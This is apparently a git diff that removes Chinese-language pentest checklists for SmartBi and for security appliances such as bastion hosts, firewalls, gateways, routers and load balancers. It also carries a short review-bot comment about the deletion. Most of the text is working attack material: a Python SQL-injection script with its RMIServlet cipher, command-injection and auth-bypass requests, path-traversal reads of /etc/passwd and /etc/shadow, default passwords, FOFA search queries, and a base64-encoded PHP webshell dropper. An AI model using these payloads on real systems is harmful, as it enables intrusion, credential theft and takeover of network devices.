Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: FQPassword=; JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB
Upgrade-Insecure-Requests: 1
sheetIndex=0&resid=I40281d81016a8bc28bc20231016aaee007b230ac&clientId=Iff8080810176f0c7f0c7544f0176f54eb72c1160&refreshType=refresh&paramsInfo=%5B%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22name%22%3A%22%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22alias%22%3A%22%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22value%22%3A%22'11111%22%2C%22displayValue%22%3A%22'11111%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22name%22%3A%22%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22alias%22%3A%22%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22value%22%3A%22440000%22%2C%22displayValue%22%3A%22%E5%B9%BF%E4%B8%9C%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%E5%85%A8%E9%83%A8%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%E5%85%A8%E9%83%A8%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.id%22%2C%22name%22%3A%22id%22%2C%22alias%22%3A%22%E6%A3%80%E6%B5%8B%E6%9C%BA%E6%9E%84id%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97
%B4%E8%B5%B7%22%2C%22name%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22alias%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22name%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22alias%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22name%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22alias%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22name%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22alias%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%5D&pageId=0&writeBackData=&exportSheetIndexes=&exportId=&op=%7B%22getTotalPages%22%3Atrue%2C%22sheetPageCounts%22%3A%5B1%5D%7D
```
#### 0x02 RMIServet加密后注入
报错注入脚本:
```
#coding=utf-8
import requests
from urllib.parse import quote,unquote
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
#去除https的warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
ENCODING_SCHEDULE = {
"0": "7", "1": "1", "2": "u", "3": "N", "4": "K", "5": "J", "6": "M", "7": "9", "8": "'", "9": "m", "!": "P",
"%": "/", "'": "n", "(": "A", ")": "E", "*": "s", "+": "+", "-": "f", ".": "q", "A": "O", "B": "V", "C": "t",
"D": "T", "E": "a", "F": "x", "G": "H", "H": "r", "I": "c", "J": "v", "K": "l", "L": "8", "M": "F", "N": "3",
"O": "o", "P": "L", "Q": "Y", "R": "j", "S": "W", "T": "*", "U": "z", "V": "Z", "W": "!", "X": "B", "Y": ")",
"Z": "U", "a": "(", "b": "~", "c": "i", "d": "h", "e": "p", "f": "_", "g": "-", "h": "I", "i": "R", "j": ".",
"k": "G", "l": "S", "m": "d", "n": "6", "o": "w", "p": "5", "q": "0", "r": "4", "s": "D", "t": "k", "u": "Q",
"v": "g", "w": "b", "x": "C", "y": "2", "z": "X", "~": "e", "_": "y",
}
DECODING_SCHEDULE = {
"7": "0", "1": "1", "u": "2", "N": "3", "K": "4", "J": "5", "M": "6", "9": "7", "'": "8", "m": "9", "P": "!",
"/": "%", "n": "'", "A": "(", "E": ")", "s": "*", "+": "+", "f": "-", "q": ".", "O": "A", "V": "B", "t": "C",
"T": "D", "a": "E", "x": "F", "H": "G", "r": "H", "c": "I", "v": "J", "l": "K", "8": "L", "F": "M", "3": "N",
"o": "O", "L": "P", "Y": "Q", "j": "R", "W": "S", "*": "T", "z": "U", "Z": "V", "!": "W", "B": "X", ")": "Y",
"U": "Z", "(": "a", "~": "b", "i": "c", "h": "d", "p": "e", "_": "f", "-": "g", "I": "h", "R": "i", ".": "j",
"G": "k", "S": "l", "d": "m", "6": "n", "w": "o", "5": "p", "0": "q", "4": "r", "D": "s", "k": "t", "Q": "u",
"g": "v", "b": "w", "C": "x", "2": "y", "X": "z", "e": "~", "y": "_",
}
#此函数可以用来加密明文也可以解密服务器返回的密文
def encode(code):
out = ""
for item in code:
out = out + ENCODING_SCHEDULE.get(item, item)
return out
def decode(code):
out = ""
for item in code:
out = out + DECODING_SCHEDULE.get(item, item)
return out
url = "https://127.0.0.1/vision/ssreportServlet"
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded",
"Cookie":"JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB"
}
origin1 = '''[{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.单位名称","name":"单位名称","alias":"单位名称","value":"'''
origin2 = '''","displayValue":"'''
origin3 = '''"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所属机构","name":"所属机构","alias":"所属机构","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在省份","name":"所在省份","alias":"所在省份","value":"440000","displayValue":"广东"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在地市","name":"所在地市","alias":"所在地市","value":"","displayValue":"全部"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在区县","name":"所在区县","alias":"所在区县","value":"","displayValue":"全部"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.id","name":"id","alias":"检测机构id","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.填报时间起","name":"填报时间起","alias":"填报时间起","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.填报时间止","name":"填报时间止","alias":" 填报时间止","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.更新时间起","name":"更新时间起","alias":"更新时间起","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.更新时间止","name":"更新时间止","alias":"更新时间止","value":"","displayValue":""}]'''
for i in range(1,20):
payload = "%' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {0},1),0x7e)) and null = '%".format(i)
# print(payload)
origin_full = origin1 + payload + origin2 + payload + origin3
# print(origin_full)
url_encode_full = quote(origin_full)
# print(url_encode_full)
rmi_encode = encode(url_encode_full)
# print(rmi_encode)
encode_final = 'encode='+rmi_encode
data = {
"resid":"I40281d81016a8bc28bc20231016aaee007b230ac",
"clientId":"Iff8080810176f0c7f0c7544f0176f54eb72c1160",
"refreshType":"refresh",
"paramsInfoEncode":encode_final
}
#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
r = requests.post(url,data=data,headers=headers,verify=False)
#print(r.text)
regex = r"~\w+~"
match = re.search(regex,r.text).span() #返回第一个匹配到的结果的位置1000,1005
database = r.text[match[0]+1:match[1]-1]
print(r.text[match[0]:match[1]])
with open('file.txt','a+') as f:
f.write(database+'\n')
```
## 五、任意文件读取
V85以下的可能任意文件下载都有V95版本不存在。
```
https://127.0.0.1/vision/FileServlet?ftpType=out&path=upload/../../../../../../../../../../etc/passwd&name=%E4%B8%AD%E5%9B%BD%E7%9F%B3%E6%B2%B9%E5%90%89%E6%9E%97%E7%99%BD%E5%9F%8E%E9%94%80%E5%94%AE%E5%88%86%E5%85%AC%E5%8F%B8XX%E5%8A%A0%E6%B2%B9%E7%AB%99%E9%98%B2%E9%9B%B7%E5%AE%89%E5%85%A8%E5%BA%94%E6%80%A5%E9%A2%84%E6%A1%88.docx
```
## 附录、RMIServet加解密
SmartBi 有两种传参方式RMIServlet 加密或直接传输。
### 0x01 RMIServlet加密
```
POST /vision/RMIServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/index.jsp
If-Modified-Since: 0
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 148
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
encode=zDp4Wp4gRip+Q5h(kpzDp4xw4tI(6-p+/JV/uuc'(mKi(Kp719J(~K((~K(((pm719JhNp'uKiMM('9/uu/ut/uuXIw6--Qw1/uu/ut/uu6QSS/uu/ut/uuY!a0bp1uN/uu/utk4Qp/JT
```
### 0x02 直接传输
上述encode加密字段解密后为
```
UserService+updateUserForChange+["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
```
等同于:
```
className=UserService&methodName=updateUserForChange&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
```
构造数据包:
```
POST /vision/RMIServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/index.jsp
If-Modified-Since: 0
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 148
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
className=UserService&methodName=updateUserForChange&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
```
### 0x03 RMIServet加解密脚本
```python
from urllib.parse import unquote
from urllib.parse import quote
ENCODING_SCHEDULE = {
"0": "7", "1": "1", "2": "u", "3": "N", "4": "K", "5": "J", "6": "M", "7": "9", "8": "'", "9": "m", "!": "P",
"%": "/", "'": "n", "(": "A", ")": "E", "*": "s", "+": "+", "-": "f", ".": "q", "A": "O", "B": "V", "C": "t",
"D": "T", "E": "a", "F": "x", "G": "H", "H": "r", "I": "c", "J": "v", "K": "l", "L": "8", "M": "F", "N": "3",
"O": "o", "P": "L", "Q": "Y", "R": "j", "S": "W", "T": "*", "U": "z", "V": "Z", "W": "!", "X": "B", "Y": ")",
"Z": "U", "a": "(", "b": "~", "c": "i", "d": "h", "e": "p", "f": "_", "g": "-", "h": "I", "i": "R", "j": ".",
"k": "G", "l": "S", "m": "d", "n": "6", "o": "w", "p": "5", "q": "0", "r": "4", "s": "D", "t": "k", "u": "Q",
"v": "g", "w": "b", "x": "C", "y": "2", "z": "X", "~": "e", "_": "y",
}
DECODING_SCHEDULE = {
"7": "0", "1": "1", "u": "2", "N": "3", "K": "4", "J": "5", "M": "6", "9": "7", "'": "8", "m": "9", "P": "!",
"/": "%", "n": "'", "A": "(", "E": ")", "s": "*", "+": "+", "f": "-", "q": ".", "O": "A", "V": "B", "t": "C",
"T": "D", "a": "E", "x": "F", "H": "G", "r": "H", "c": "I", "v": "J", "l": "K", "8": "L", "F": "M", "3": "N",
"o": "O", "L": "P", "Y": "Q", "j": "R", "W": "S", "*": "T", "z": "U", "Z": "V", "!": "W", "B": "X", ")": "Y",
"U": "Z", "(": "a", "~": "b", "i": "c", "h": "d", "p": "e", "_": "f", "-": "g", "I": "h", "R": "i", ".": "j",
"G": "k", "S": "l", "d": "m", "6": "n", "w": "o", "5": "p", "0": "q", "4": "r", "D": "s", "k": "t", "Q": "u",
"g": "v", "b": "w", "C": "x", "2": "y", "X": "z", "e": "~", "y": "_",
}
#此函数可以用来加密明文也可以解密服务器返回的密文
def encode(code):
out = ""
for item in code:
out = out + ENCODING_SCHEDULE.get(item, item)
return out
def decode(code):
out = ""
for item in code:
out = out + DECODING_SCHEDULE.get(item, item)
return out
def read():
with open('read.txt', 'r') as f:
return f.read()
a=read()
b = decode(a)
c = encode(a)
print('Input: ' + a + '\n')
print('decode: ' + b + '\n')
print('decode-unquote-url: '+unquote(b,'utf-8'))
print('encode: '+c)
```
注:加密和解密的过程就是替换字符的过程,最终解密得到的是 url 编码,加密时传入的文本也要是 url 编码。
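Review bot: this deletion drops the SmartBi checklist with no forwarding pointer; the README index hunk later in this commit removes the "SmartBi 漏洞 Checklist" entry, so the removal is consistent, but the RMIServlet substitution-table script (the one reusable piece of this file, and the only place the ENCODING_SCHEDULE/DECODING_SCHEDULE mapping is recorded) disappears with nothing saying where it now lives. If the checklists are being re-homed rather than retired, a one-line note in the README hunk would save readers from hunting through history.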

View File

@ -1,865 +0,0 @@
# 安全设备漏洞 Checklist
更新时间2023.06
##### **【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 [法律法规](https://github.com/Threekiii/Awesome-Laws)。**
&#x2705; 表示漏洞文档已收录 [Vulnerability-Wiki]( https://github.com/Threekiii/Vulnerability-Wiki) 漏洞库仅收录2022/2023年部分安全设备全部 iot 漏洞列表见 [README.md](https://github.com/Threekiii/Vulnerability-Wiki/blob/master/docs-base/docs/iot/README.md)。参考阅读:[ffffffff0x/SecDevice-Exploits](https://github.com/ffffffff0x/1earn/blob/master/1earn/Security/RedTeam/%E5%AE%89%E9%98%B2%E8%AE%BE%E5%A4%87/SecDevice-Exploits.md#%E9%BD%90%E6%B2%BB%E5%A0%A1%E5%9E%92%E6%9C%BA)
## 一、身份与访问控制
### 0x01 堡垒机
#### 齐智堡垒机
FOFA
```
app="齐治科技-堡垒机"
```
##### 默认口令
```
shterm/shterm
```
##### shterm命令执行 tui.update.php
```
POST /shterm/listener/tui_update.php
a=["t';import os;os.popen('whoami')#"]
```
##### 前台命令执行 cluster_manage.php CNVD-2019-20835
访问以下路径,返回 ok
```
http://10.20.10.11/listener/cluster_manage.php
```
写入webshell
```
/var/www/shterm/resources/qrcode/lbj77.php 密码10086
```
```
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
```
##### 后台命令执行 data_provider.php CNVD-2019-17294
```
POST /audit/data_provider.php?ds_y=2019&ds_m=03&ds_d=02&ds_hour=01&ds_min=40&server_cond=&service=`id`&identity_cond=&query_type=all&format=json&browse=true
Host: your-ip
page=1&rp=30&sortname=stampl&sortorder=desc&query=&qtype=
```
##### 任意用户登录
```
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
```
#### H3C SecPath
FOFA
```
app="H3C-SecPath-运维审计系统" && body="2018"
```
#### Teleport 堡垒机
FOFA
```
app="TELEPORT堡垒机"
```
##### 任意用户登录
返回 code 为 0 说明成功,刷新首页即可进入后台:
```
POST /auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"xxxx","oath":"","remember":false}
```
##### 后台文件读取
```
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&amp;offset=0
```
### 0x02 IMC
#### H3C IMC 智能管理中心
FOFA
```
"/imc/javax.faces.resource/images/login_logo_h3c.png.jsf?ln=primefaces-imc-new-webui"
```
```
body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"
```
```
body="iMC来宾接入自助管理系统"
```
##### 远程代码执行
```
POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 1567
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
```
## 二、网络检测与响应
### 0x01 蜜罐
### 0x02 IDS
#### 绿盟 UTS 综合威胁探针
##### 管理员任意登录
输入 admin/任意密码,点击登录。更改响应包,将 {"status":false,...} 中的 false 改为 true此时响应包将泄露 admin 用户密码的 md5 值。
利用 md5 值登录页面:
```
POST /webapi/v1/authen_user
{"username":"admin","password":md5}
```
### 0x03 防火墙
#### 安恒 明御WEB应用防火墙
FOFA
```
app="安恒信息-明御WAF"
```
##### report.php 任意用户登录✅
漏洞指纹:
```
/report.m?a=rpc-timed
/system.m?a=reserved
```
#### Cisco ASA
```
app="CISCO-ASA-5520"
```
##### 拒绝服务/敏感信息获取 CVE-2018-0296
exp
- https://github.com/yassineaboukir/CVE-2018-0296
- https://github.com/milo2012/CVE-2018-0296
##### 任意文件删除 CVE-2020-3187
exp
- https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
##### 目录穿越/任意文件读取 CVE-2020-3452
漏洞影响
```
Cisco ASA 设备影响版本:
<9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10
```
```
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```
#### H3C SecPath下一代防火墙
FOFA
```
title="Web user login"
```
##### 任意文件下载 ✅
```
/webui/?g=sys_dia_data_check&file_name=../../etc/passwd
```
```
/webui/?
g=sys_capture_file_download&name=../../../../../../../../etc/passwd
```
#### 奇安信 网康下一代防火墙
FOFA
```
app="网康科技-下一代防火墙"
```
##### 远程命令执行 ✅
```
POST /directdata/direct/router HTTP/1.1
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
```
访问:
```
https://x.x.x.x/test_test.txt
```
#### 启明星辰 天清汉马USG防火墙
##### 默认口令
```
useradmin/venus.user
```
#### 佑友防火墙
##### 默认口令
```
admin/hicomadmin
```
##### 后台命令执行
```
系统管理 --> 维护工具 --> Ping
127.0.0.1|cat /etc/passwd
```
#### ZeroShell
FOFA
```
app="Zeroshell-防火墙"
```
##### ZeroShell 3.9.0 cgi-bin/kerbynet 命令执行
exp
- https://www.exploit-db.com/exploits/49096
### 0x04 网关
#### 奇安信 网康 NS-ASG 安全网关
FOFA
```
网康 NS-ASG 安全网关
```
##### 任意文件读取 ✅
```
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
```
#### 安恒 明御安全网关
##### 命令执行/任意文件读取✅
漏洞指纹:
```
/webui/?g=aaa_portal_auth_local_submit&suffix=
/webui/?g=sys_dia_data_down&file_name=
/webui/?g=sys_dia_data_check&file_name=
...
```
#### 锐捷 EG 易网关
##### 管理员账号密码泄露 ✅
获取账号密码:
```
POST /login.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
username=admin&password=admin?show+webmaster+user
```
##### branch_passw.php 远程命令执行 ✅
发送请求包:
```
POST /itbox_pi/branch_passw.php?a=set HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=52222egp72ilkpf2de7qbrigk3;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
pass=|cat /etc/psswd>../test_test.txt
```
再访问:
```
http://your-ip/test_test.txt
```
##### cli.php 远程命令执行 ✅
发送请求包:
```
POST /cli.php?a=shell HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=nk5erth9i0pvcco3n7fbpa9bi0;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
notdelay=true&command=id
```
##### download.php 任意文件读取 ✅
poc
```
/download.php?a=read_txt&file=../../../../etc/passwd
```
#### 锐捷 ISG 视频接入安全网关
##### 账号密码泄露漏洞 ✅
FOFA
```
title="RG-ISG"
```
F12 查看到账号密码解密md5 后登陆系统。
### 0x05 路由器
#### D-Link DAP-2020
FOFA
```
body="DAP-1360" && body="6.05"
```
##### webproc 任意文件读取 CVE-2021-27250 ✅
poc
```
POST /cgi-bin/webproc
getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123
```
#### H3C 企业路由器ER、ERG2、GR系列
##### 任意用户登录漏洞 ✅
攻击者可通过访问 /userLogin.asp/../actionpolicy_status/../xxxx.cfg 接口xxxx 为设备型号(比如设备型号为 ER5200G2即访问 /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg绕过 COOKIE 验证,进行目录穿越,获取设备的明文配置文件。
配置中有明文的 Web 管理员账号 admin 密码,登录后台可通过开启 telnet 获取命令执行权限。
#### iKuai 路由器
FOFA
```
title="登录爱快流控路由"
```
##### 后台任意文件读取✅
默认密码admin/admin
poc
```
GET /Action/download?filename=../../../../../../etc/shadow HTTP/1.1
Host
....
```
##### 流控路由 SQL注入漏洞✅
万能密码登录:
```
user: "or""=""or""="
pass: 空
```
#### 锐捷 NBR路由器
##### 远程命令执行漏洞 CNVD-2021-09650 ✅
FOFA
```
title="锐捷网络-EWEB网管系统"
icon_hash="-692947551"
```
构造命令执行:
```
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
```
再访问:
```
/guest_auth/test.txt
```
### 0x06 负载均衡
#### Citrix ADC
##### 默认口令
```
nsroot/nsroot
```
##### 远程代码执行 CVE-2019-19781
访问以下链接返回403则表示不存在漏洞返回smb.conf则证明漏洞存在。
```
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure
```
exp
- https://github.com/trustedsec/cve-2019-19781
- https://github.com/jas502n/CVE-2019-19781
#### F5 BIG-IP
##### 远程代码执行 CVE-2020-5902
exp
- https://github.com/jas502n/CVE-2020-5902
- https://github.com/theLSA/f5-bigip-rce-cve-2020-5902
##### 远程代码执行 CVE-2021-22986
```
POST /mgmt/tm/util/bash HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 41
{"command":"run","utilCmdArgs":"-c id"}
```
exp
- https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP
- https://github.com/Al1ex/CVE-2021-22986
#### 天融信 Top-app LB
##### SQL注入
```
POST /acc/clsf/report/datasource.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
